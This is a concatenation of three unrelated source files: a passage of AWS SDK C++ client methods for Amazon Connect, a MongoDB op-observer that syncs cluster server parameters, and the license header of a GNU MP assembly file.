void ConnectClient::ListUsersAsync(const ListUsersRequest& request, const ListUsersResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->ListUsersAsyncHelper( request, handler, context ); } );
}
void ConnectClient::ListUsersAsyncHelper(const ListUsersRequest& request, const ListUsersResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, ListUsers(request), context);
}
StartChatContactOutcome ConnectClient::StartChatContact(const StartChatContactRequest& request) const
{
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/contact/chat";
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_PUT, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return StartChatContactOutcome(StartChatContactResult(outcome.GetResult()));
}
else
{
return StartChatContactOutcome(outcome.GetError());
}
}
StartChatContactOutcomeCallable ConnectClient::StartChatContactCallable(const StartChatContactRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< StartChatContactOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->StartChatContact(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::StartChatContactAsync(const StartChatContactRequest& request, const StartChatContactResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->StartChatContactAsyncHelper( request, handler, context ); } );
}
void ConnectClient::StartChatContactAsyncHelper(const StartChatContactRequest& request, const StartChatContactResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, StartChatContact(request), context);
}
StartOutboundVoiceContactOutcome ConnectClient::StartOutboundVoiceContact(const StartOutboundVoiceContactRequest& request) const
{
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/contact/outbound-voice";
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_PUT, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return StartOutboundVoiceContactOutcome(StartOutboundVoiceContactResult(outcome.GetResult()));
}
else
{
return StartOutboundVoiceContactOutcome(outcome.GetError());
}
}
StartOutboundVoiceContactOutcomeCallable ConnectClient::StartOutboundVoiceContactCallable(const StartOutboundVoiceContactRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< StartOutboundVoiceContactOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->StartOutboundVoiceContact(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::StartOutboundVoiceContactAsync(const StartOutboundVoiceContactRequest& request, const StartOutboundVoiceContactResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->StartOutboundVoiceContactAsyncHelper( request, handler, context ); } );
}
void ConnectClient::StartOutboundVoiceContactAsyncHelper(const StartOutboundVoiceContactRequest& request, const StartOutboundVoiceContactResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, StartOutboundVoiceContact(request), context);
}
StopContactOutcome ConnectClient::StopContact(const StopContactRequest& request) const
{
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/contact/stop";
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_POST, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return StopContactOutcome(StopContactResult(outcome.GetResult()));
}
else
{
return StopContactOutcome(outcome.GetError());
}
}
StopContactOutcomeCallable ConnectClient::StopContactCallable(const StopContactRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< StopContactOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->StopContact(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::StopContactAsync(const StopContactRequest& request, const StopContactResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->StopContactAsyncHelper( request, handler, context ); } );
}
void ConnectClient::StopContactAsyncHelper(const StopContactRequest& request, const StopContactResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, StopContact(request), context);
}
TagResourceOutcome ConnectClient::TagResource(const TagResourceRequest& request) const
{
if (!request.ResourceArnHasBeenSet())
{
AWS_LOGSTREAM_ERROR("TagResource", "Required field: ResourceArn, is not set");
return TagResourceOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [ResourceArn]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/tags/";
ss << request.GetResourceArn();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_POST, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return TagResourceOutcome(NoResult());
}
else
{
return TagResourceOutcome(outcome.GetError());
}
}
TagResourceOutcomeCallable ConnectClient::TagResourceCallable(const TagResourceRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< TagResourceOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->TagResource(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::TagResourceAsync(const TagResourceRequest& request, const TagResourceResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->TagResourceAsyncHelper( request, handler, context ); } );
}
void ConnectClient::TagResourceAsyncHelper(const TagResourceRequest& request, const TagResourceResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, TagResource(request), context);
}
UntagResourceOutcome ConnectClient::UntagResource(const UntagResourceRequest& request) const
{
if (!request.ResourceArnHasBeenSet())
{
AWS_LOGSTREAM_ERROR("UntagResource", "Required field: ResourceArn, is not set");
return UntagResourceOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [ResourceArn]", false));
}
if (!request.TagKeysHasBeenSet())
{
AWS_LOGSTREAM_ERROR("UntagResource", "Required field: TagKeys, is not set");
return UntagResourceOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [TagKeys]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/tags/";
ss << request.GetResourceArn();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_DELETE, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return UntagResourceOutcome(NoResult());
}
else
{
return UntagResourceOutcome(outcome.GetError());
}
}
UntagResourceOutcomeCallable ConnectClient::UntagResourceCallable(const UntagResourceRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< UntagResourceOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->UntagResource(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::UntagResourceAsync(const UntagResourceRequest& request, const UntagResourceResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->UntagResourceAsyncHelper( request, handler, context ); } );
}
void ConnectClient::UntagResourceAsyncHelper(const UntagResourceRequest& request, const UntagResourceResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, UntagResource(request), context);
}
UpdateContactAttributesOutcome ConnectClient::UpdateContactAttributes(const UpdateContactAttributesRequest& request) const
{
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/contact/attributes";
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_POST, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return UpdateContactAttributesOutcome(UpdateContactAttributesResult(outcome.GetResult()));
}
else
{
return UpdateContactAttributesOutcome(outcome.GetError());
}
}
UpdateContactAttributesOutcomeCallable ConnectClient::UpdateContactAttributesCallable(const UpdateContactAttributesRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< UpdateContactAttributesOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->UpdateContactAttributes(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::UpdateContactAttributesAsync(const UpdateContactAttributesRequest& request, const UpdateContactAttributesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->UpdateContactAttributesAsyncHelper( request, handler, context ); } );
}
void ConnectClient::UpdateContactAttributesAsyncHelper(const UpdateContactAttributesRequest& request, const UpdateContactAttributesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, UpdateContactAttributes(request), context);
}
UpdateUserHierarchyOutcome ConnectClient::UpdateUserHierarchy(const UpdateUserHierarchyRequest& request) const
{
if (!request.UserIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("UpdateUserHierarchy", "Required field: UserId, is not set");
return UpdateUserHierarchyOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [UserId]", false));
}
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("UpdateUserHierarchy", "Required field: InstanceId, is not set");
return UpdateUserHierarchyOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/users/";
ss << request.GetInstanceId();
ss << "/";
ss << request.GetUserId();
ss << "/hierarchy";
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_POST, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return UpdateUserHierarchyOutcome(NoResult());
}
else
{
return UpdateUserHierarchyOutcome(outcome.GetError());
}
}
UpdateUserHierarchyOutcomeCallable ConnectClient::UpdateUserHierarchyCallable(const UpdateUserHierarchyRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< UpdateUserHierarchyOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->UpdateUserHierarchy(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::UpdateUserHierarchyAsync(const UpdateUserHierarchyRequest& request, const UpdateUserHierarchyResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->UpdateUserHierarchyAsyncHelper( request, handler, context ); } );
}
void ConnectClient::UpdateUserHierarchyAsyncHelper(const UpdateUserHierarchyRequest& request, const UpdateUserHierarchyResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, UpdateUserHierarchy(request), context);
}
UpdateUserIdentityInfoOutcome ConnectClient::UpdateUserIdentityInfo(const UpdateUserIdentityInfoRequest& request) const
{
if (!request.UserIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("UpdateUserIdentityInfo", "Required field: UserId, is not set");
return UpdateUserIdentityInfoOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [UserId]", false));
}
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("UpdateUserIdentityInfo", "Required field: InstanceId, is not set");
return UpdateUserIdentityInfoOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/users/";
ss << request.GetInstanceId();
ss << "/";
ss << request.GetUserId();
ss << "/identity-info";
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_POST, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return UpdateUserIdentityInfoOutcome(NoResult());
}
else
{
return UpdateUserIdentityInfoOutcome(outcome.GetError());
}
}
UpdateUserIdentityInfoOutcomeCallable ConnectClient::UpdateUserIdentityInfoCallable(const UpdateUserIdentityInfoRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< UpdateUserIdentityInfoOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->UpdateUserIdentityInfo(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::UpdateUserIdentityInfoAsync(const UpdateUserIdentityInfoRequest& request, const UpdateUserIdentityInfoResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->UpdateUserIdentityInfoAsyncHelper( request, handler, context ); } );
}
void ConnectClient::UpdateUserIdentityInfoAsyncHelper(const UpdateUserIdentityInfoRequest& request, const UpdateUserIdentityInfoResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, UpdateUserIdentityInfo(request), context);
}
UpdateUserPhoneConfigOutcome ConnectClient::UpdateUserPhoneConfig(const UpdateUserPhoneConfigRequest& request) const
{
if (!request.UserIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("UpdateUserPhoneConfig", "Required field: UserId, is not set");
return UpdateUserPhoneConfigOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [UserId]", false));
}
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("UpdateUserPhoneConfig", "Required field: InstanceId, is not set");
return UpdateUserPhoneConfigOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/users/";
ss << request.GetInstanceId();
ss << "/";
ss << request.GetUserId();
ss << "/phone-config";
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_POST, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return UpdateUserPhoneConfigOutcome(NoResult());
}
else
{
return UpdateUserPhoneConfigOutcome(outcome.GetError());
}
}
UpdateUserPhoneConfigOutcomeCallable ConnectClient::UpdateUserPhoneConfigCallable(const UpdateUserPhoneConfigRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< UpdateUserPhoneConfigOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->UpdateUserPhoneConfig(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::UpdateUserPhoneConfigAsync(const UpdateUserPhoneConfigRequest& request, const UpdateUserPhoneConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->UpdateUserPhoneConfigAsyncHelper( request, handler, context ); } );
}
void ConnectClient::UpdateUserPhoneConfigAsyncHelper(const UpdateUserPhoneConfigRequest& request, const UpdateUserPhoneConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, UpdateUserPhoneConfig(request), context);
}
UpdateUserRoutingProfileOutcome ConnectClient::UpdateUserRoutingProfile(const UpdateUserRoutingProfileRequest& request) const
{
if (!request.UserIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("UpdateUserRoutingProfile", "Required field: UserId, is not set");
return UpdateUserRoutingProfileOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [UserId]", false));
}
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("UpdateUserRoutingProfile", "Required field: InstanceId, is not set");
return UpdateUserRoutingProfileOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/users/";
ss << request.GetInstanceId();
ss << "/";
ss << request.GetUserId();
ss << "/routing-profile";
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_POST, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return UpdateUserRoutingProfileOutcome(NoResult());
}
else
{
return UpdateUserRoutingProfileOutcome(outcome.GetError());
}
}
UpdateUserRoutingProfileOutcomeCallable ConnectClient::UpdateUserRoutingProfileCallable(const UpdateUserRoutingProfileRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< UpdateUserRoutingProfileOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->UpdateUserRoutingProfile(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::UpdateUserRoutingProfileAsync(const UpdateUserRoutingProfileRequest& request, const UpdateUserRoutingProfileResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->UpdateUserRoutingProfileAsyncHelper( request, handler, context ); } );
}
void ConnectClient::UpdateUserRoutingProfileAsyncHelper(const UpdateUserRoutingProfileRequest& request, const UpdateUserRoutingProfileResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, UpdateUserRoutingProfile(request), context);
}
UpdateUserSecurityProfilesOutcome ConnectClient::UpdateUserSecurityProfiles(const UpdateUserSecurityProfilesRequest& request) const
{
if (!request.UserIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("UpdateUserSecurityProfiles", "Required field: UserId, is not set");
return UpdateUserSecurityProfilesOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [UserId]", false));
}
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("UpdateUserSecurityProfiles", "Required field: InstanceId, is not set");
return UpdateUserSecurityProfilesOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/users/";
ss << request.GetInstanceId();
ss << "/";
ss << request.GetUserId();
ss << "/security-profiles";
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_POST, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return UpdateUserSecurityProfilesOutcome(NoResult());
}
else
{
return UpdateUserSecurityProfilesOutcome(outcome.GetError());
}
}
UpdateUserSecurityProfilesOutcomeCallable ConnectClient::UpdateUserSecurityProfilesCallable(const UpdateUserSecurityProfilesRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< UpdateUserSecurityProfilesOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->UpdateUserSecurityProfiles(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::UpdateUserSecurityProfilesAsync(const UpdateUserSecurityProfilesRequest& request, const UpdateUserSecurityProfilesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->UpdateUserSecurityProfilesAsyncHelper( request, handler, context ); } );
}
void ConnectClient::UpdateUserSecurityProfilesAsyncHelper(const UpdateUserSecurityProfilesRequest& request, const UpdateUserSecurityProfilesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, UpdateUserSecurityProfiles(request), context);
}
|
/**
* Copyright (C) 2022-present MongoDB, Inc.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the Server Side Public License, version 1,
* as published by MongoDB, Inc.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* Server Side Public License for more details.
*
* You should have received a copy of the Server Side Public License
* along with this program. If not, see
* <http://www.mongodb.com/licensing/server-side-public-license>.
*
* As a special exception, the copyright holders give permission to link the
* code of portions of this program with the OpenSSL library under certain
* conditions as described in each individual source file and distribute
* linked combinations including the program with the OpenSSL library. You
* must comply with the Server Side Public License in all respects for
* all of the code used other than as permitted herein. If you modify file(s)
* with this exception, you may extend this exception to your version of the
* file(s), but you are not obligated to do so. If you do not wish to do so,
* delete this exception statement from your version. If you delete this
* exception statement from all source files in the program, then also delete
* it in the license file.
*/
#include "mongo/idl/cluster_server_parameter_op_observer.h"
#include <memory>
#include "mongo/db/dbdirectclient.h"
#include "mongo/logv2/log.h"
#define MONGO_LOGV2_DEFAULT_COMPONENT ::mongo::logv2::LogComponent::kControl
namespace mongo {
namespace {
constexpr auto kIdField = "_id"_sd;
constexpr auto kCPTField = "clusterParameterTime"_sd;
/**
* Per-operation scratch space indicating the document being deleted.
* This is used in the aboutToDelte/onDelete handlers since the document
* is not necessarily available in the latter.
*/
const auto aboutToDeleteDoc = OperationContext::declareDecoration<std::string>();
bool isConfigNamespace(const NamespaceString& nss) {
return nss == NamespaceString::kClusterParametersNamespace;
}
constexpr auto kOplog = "oplog"_sd;
void updateParameter(BSONObj doc, StringData mode) {
auto nameElem = doc[kIdField];
if (nameElem.type() != String) {
LOGV2_DEBUG(6226301,
1,
"Update with invalid cluster server parameter name",
"mode"_attr = mode,
"_id"_attr = nameElem);
return;
}
auto name = doc[kIdField].valueStringData();
auto* sp = ServerParameterSet::getClusterParameterSet()->getIfExists(name);
if (!sp) {
LOGV2_DEBUG(6226300,
3,
"Update to unknown cluster server parameter",
"mode"_attr = mode,
"name"_attr = name);
return;
}
auto cptElem = doc[kCPTField];
if ((cptElem.type() != mongo::Date) && (cptElem.type() != bsonTimestamp)) {
LOGV2_DEBUG(6226302,
1,
"Update to cluster server parameter has invalid clusterParameterTime",
"mode"_attr = mode,
"name"_attr = name,
"clusterParameterTime"_attr = cptElem);
return;
}
uassertStatusOK(sp->set(doc));
}
void clearParameter(ServerParameter* sp) {
if (sp->getClusterParameterTime() == LogicalTime::kUninitialized) {
// Nothing to clear.
return;
}
uassertStatusOK(sp->reset());
}
void clearParameter(StringData id) {
auto* sp = ServerParameterSet::getClusterParameterSet()->getIfExists(id);
if (!sp) {
LOGV2_DEBUG(6226303,
5,
"oplog event deletion of unknown cluster server parameter",
"name"_attr = id);
return;
}
clearParameter(sp);
}
void clearAllParameters() {
const auto& params = ServerParameterSet::getClusterParameterSet()->getMap();
for (const auto& it : params) {
clearParameter(it.second);
}
}
template <typename OnEntry>
void doLoadAllParametersFromDisk(OperationContext* opCtx, StringData mode, OnEntry onEntry) try {
std::vector<Status> failures;
DBDirectClient client(opCtx);
FindCommandRequest findRequest{NamespaceString::kClusterParametersNamespace};
client.find(std::move(findRequest), ReadPreferenceSetting{}, [&](BSONObj doc) {
try {
onEntry(doc, mode);
} catch (const DBException& ex) {
failures.push_back(ex.toStatus());
}
});
if (!failures.empty()) {
StringBuilder msg;
for (const auto& failure : failures) {
msg << failure.toString() << ", ";
}
msg.reset(msg.len() - 2);
uasserted(ErrorCodes::OperationFailed, msg.str());
}
} catch (const DBException& ex) {
uassertStatusOK(ex.toStatus().withContext(
str::stream() << "Failed " << mode << " cluster server parameters from disk"));
}
/**
* Used on rollback and rename with drop.
* Updates settings which are present and clears settings which are not.
*/
void resynchronizeAllParametersFromDisk(OperationContext* opCtx) {
const auto& allParams = ServerParameterSet::getClusterParameterSet()->getMap();
std::set<std::string> unsetSettings;
for (const auto& it : allParams) {
unsetSettings.insert(it.second->name());
}
doLoadAllParametersFromDisk(
opCtx, "resynchronizing"_sd, [&unsetSettings](BSONObj doc, StringData mode) {
unsetSettings.erase(doc[kIdField].str());
updateParameter(doc, mode);
});
// For all known settings which were not present in this resync,
// explicitly clear any value which may be present in-memory.
for (const auto& setting : unsetSettings) {
clearParameter(setting);
}
}
} // namespace
void ClusterServerParameterOpObserver::initializeAllParametersFromDisk(OperationContext* opCtx) {
doLoadAllParametersFromDisk(opCtx, "initializing"_sd, updateParameter);
}
void ClusterServerParameterOpObserver::onInserts(OperationContext* opCtx,
const NamespaceString& nss,
const UUID& uuid,
std::vector<InsertStatement>::const_iterator first,
std::vector<InsertStatement>::const_iterator last,
bool fromMigrate) {
if (!isConfigNamespace(nss)) {
return;
}
for (auto it = first; it != last; ++it) {
updateParameter(it->doc, kOplog);
}
}
void ClusterServerParameterOpObserver::onUpdate(OperationContext* opCtx,
const OplogUpdateEntryArgs& args) {
auto updatedDoc = args.updateArgs->updatedDoc;
if (!isConfigNamespace(args.nss) || args.updateArgs->update.isEmpty()) {
return;
}
updateParameter(updatedDoc, kOplog);
}
void ClusterServerParameterOpObserver::aboutToDelete(OperationContext* opCtx,
const NamespaceString& nss,
const UUID& uuid,
const BSONObj& doc) {
std::string docBeingDeleted;
if (isConfigNamespace(nss)) {
auto elem = doc[kIdField];
if (elem.type() == String) {
docBeingDeleted = elem.str();
} else {
// This delete makes no sense,
// but it's safe to ignore since the insert/update
// would not have resulted in an in-memory update anyway.
LOGV2_DEBUG(6226304,
3,
"Deleting a cluster-wide server parameter with non-string name",
"name"_attr = elem);
}
}
// Stash the name of the config doc being deleted (if any)
// in an opCtx decoration for use in the onDelete() hook below
// since OpLogDeleteEntryArgs isn't guaranteed to have the deleted doc.
aboutToDeleteDoc(opCtx) = std::move(docBeingDeleted);
}
void ClusterServerParameterOpObserver::onDelete(OperationContext* opCtx,
const NamespaceString& nss,
const UUID& uuid,
StmtId stmtId,
const OplogDeleteEntryArgs& args) {
const auto& docName = aboutToDeleteDoc(opCtx);
if (!docName.empty()) {
clearParameter(docName);
}
}
void ClusterServerParameterOpObserver::onDropDatabase(OperationContext* opCtx,
const std::string& dbName) {
if (dbName == NamespaceString::kConfigDb) {
// Entire config DB deleted, reset to default state.
clearAllParameters();
}
}
repl::OpTime ClusterServerParameterOpObserver::onDropCollection(
OperationContext* opCtx,
const NamespaceString& collectionName,
const UUID& uuid,
std::uint64_t numRecords,
CollectionDropType dropType) {
if (isConfigNamespace(collectionName)) {
// Entire collection deleted, reset to default state.
clearAllParameters();
}
return {};
}
void ClusterServerParameterOpObserver::postRenameCollection(
OperationContext* opCtx,
const NamespaceString& fromCollection,
const NamespaceString& toCollection,
const UUID& uuid,
const boost::optional<UUID>& dropTargetUUID,
bool stayTemp) {
if (isConfigNamespace(fromCollection)) {
// Same as collection dropped from a config point of view.
clearAllParameters();
}
if (isConfigNamespace(toCollection)) {
// Potentially many documents now set, perform full scan.
if (dropTargetUUID) {
// Possibly lost configurations in overwrite.
resynchronizeAllParametersFromDisk(opCtx);
} else {
// Collection did not exist prior to rename.
initializeAllParametersFromDisk(opCtx);
}
}
}
void ClusterServerParameterOpObserver::onImportCollection(OperationContext* opCtx,
const UUID& importUUID,
const NamespaceString& nss,
long long numRecords,
long long dataSize,
const BSONObj& catalogEntry,
const BSONObj& storageMetadata,
bool isDryRun) {
if (!isDryRun && (numRecords > 0) && isConfigNamespace(nss)) {
// Something was imported, do a full collection scan to sync up.
// No need to apply rollback rules since nothing will have been deleted.
initializeAllParametersFromDisk(opCtx);
}
}
void ClusterServerParameterOpObserver::_onReplicationRollback(OperationContext* opCtx,
const RollbackObserverInfo& rbInfo) {
if (rbInfo.rollbackNamespaces.count(NamespaceString::kClusterParametersNamespace)) {
// Some kind of rollback happend in the settings collection.
// Just reload from disk to be safe.
resynchronizeAllParametersFromDisk(opCtx);
}
}
} // namespace mongo
|
dnl Intel P5 mpn_mod_1 -- mpn by limb remainder.
dnl Copyright 1999, 2000, 2002 Free Software Foundation, Inc.
dnl
dnl This file is part of the GNU MP Library.
dnl
dnl The GNU MP Library is free software; you can redistribute it and/or
dnl modify it under the terms of the GNU Lesser General Public License as
dnl published by the Free Software Foundation; either version 3 of the
dnl License, or (at your option) any later version.
dnl
dnl The GNU MP Library is distributed in the hope that it will be useful,
dnl but WITHOUT ANY WARRANTY; without even the implied warranty of
dnl MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
dnl Lesser General Public License for more details.
dnl
dnl You should have received a copy of the GNU Lesser General Public License
dnl along with the GNU MP Library. If not, see http://www.gnu.org/licenses/.
include(`../config.m4')
C P5: 28.0 cycles/limb
C mp_limb_t mpn_mod_1 (mp_srcptr src, mp_size_t size, mp_limb_t divisor);
C mp_limb_t mpn_mod_1c (mp_srcptr src, mp_size_t size, mp_limb_t divisor,
C mp_limb_t carry);
